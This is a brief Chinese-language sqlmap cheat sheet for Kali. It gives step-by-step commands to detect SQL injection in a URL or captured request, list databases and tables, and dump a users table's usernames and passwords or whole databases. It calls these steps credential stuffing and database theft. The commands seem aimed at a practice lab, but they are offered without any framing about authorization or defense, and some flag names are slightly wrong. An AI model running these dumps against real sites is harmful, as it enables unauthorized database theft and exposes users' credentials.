设置sqlmap线程(扫描速率，范围1-10) --thread

kali端

1.判断网站是否存在注入

get类型sqlmap -u "url">检测url中是否存在注入点，如果没有注入点则运行不出来

post类型sqlmap -r 请求数据包.txt> 使用抓到的数据包文本进行检测注入

2.爆出数据库

爆出当前数据库sqlmap -u "url" --current-db --thread 10 >使用10线程

爆出网站内所有数据库sqlmap -u "url" --dbs --thread 10

3.爆出表

指出security数据库名-D security爆出所有的表--tables

爆出security数据库中所有表的数据 

sqlmap -u "url" -D security --tables--dump>撞库

爆出security数据库中所有数据 

sqlmap -u "url"  --dump-all>脱库

4.爆出列

sqlmap -u " url" -D security -T users --columns>爆出指定数据库下面指定表的所有列

5.爆出列中所有字段内容

爆出-C指定列的内容

sqlmap -u "url" -D security -T users -C id,password,username --dump